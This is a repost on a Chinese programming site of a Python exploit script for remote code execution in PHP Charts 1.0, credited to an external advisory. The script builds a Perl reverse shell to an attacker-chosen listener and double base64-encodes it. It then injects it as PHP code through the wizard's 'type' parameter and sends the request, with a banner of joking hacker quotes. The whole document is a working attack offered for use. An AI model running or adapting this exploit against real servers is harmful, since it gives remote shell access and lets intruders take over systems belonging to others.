您的位置:首页 > 编程语言 > PHP开发

PHP Charts 1.0 Remote Code Execution

2013-06-26 17:58 225 查看 
#!/usr/bin/python
# Original Advisory came from:
# http://packetstormsecurity.com/files/119582/PHP-Charts-1.0-Code-Execution.html # infodox - insecurety.net
import requests
import random
import threading
import sys

def genpayload(host, port):
""" Perl Reverse Shell Generator """
load = """perl -e 'use Socket;$i="%s";$p=%s;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';""" %(host, port)
encoded = load.encode('base64')
encoded = encoded.strip()
encoded = encoded.replace('\n', '')
encoded = encoded.encode('base64')
encoded = encoded.strip()
encoded = encoded.replace('\n', '') # double encoding , yes
payload = "system(base64_decode(base64_decode('%s')))" %(encoded)
return payload

def hack(pwn):
requests.get(pwn)

def main():
haxurl = "http://" + target + path + "wizard/index.php?type=';INSERTCODE;//"
payload = genpayload(host, port)
pwn = haxurl.replace("INSERTCODE", payload)
print "[+] Preparing for hax"
print "[!] Please run nc -lvp %s on your listener" %(port)
raw_input("Press Enter to Fire...") # debugging
print "[*] Sending malicious request..."
threading.Thread(target=hack, args=(pwn,)).start() # ph33r l33t thr34d1ng
print "[?] g0tr00t?"
sys.exit(0)

def randomQuote():
quotes =\
['Now with advice from Sabu!', 'Now with LOIC Support', 'Now with auto-DDoS',
'Now with auto-brag!', 'Now with advice from Kevin Mitnick', 'Now with silly quotes!',
'Comes with free forkbombs!', 'Now with a free copy of Havij', 'Are you stoned, or just stupid?']
randomQuote = random.choice(quotes)
return randomQuote

def banner():
print "PHP-Charts v1.0 Remote Code Execution Exploit."
randomquote = randomQuote()
print randomquote

if len(sys.argv) != 5:
banner()
print "Usage: %s <target host> <path to wizard> <listener host> <listener port>" %(sys.argv[0])
print "Example: %s hackme.com /wp/chart/chart/ hacke.rs 1337" %(sys.argv[0])
sys.exit(1)
else:
banner()
target = sys.argv[1]
path = sys.argv[2]
host = sys.argv[3]
port = sys.argv[4]
main()

                                            

                                        

                        
                        内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息 
                    

                    

                    

                        

                         标签: 
                                                

                        

                    


                

            


            

                
相关文章推荐

                

                
            

        

        

            

            
            

                

                    
新的分享

                    

                        
                    

                

            


            

                

                    
章节导航